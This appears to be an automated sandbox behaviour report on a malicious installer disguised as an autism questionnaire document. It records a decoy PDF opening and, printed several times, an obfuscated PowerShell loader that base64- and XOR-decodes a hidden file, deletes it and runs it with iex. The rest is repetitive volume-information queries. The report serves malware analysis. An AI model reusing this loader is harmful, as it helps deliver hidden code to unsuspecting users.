            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_005C8B3C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_005C8B3C
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_005C7CE0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,3_2_005C7CE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
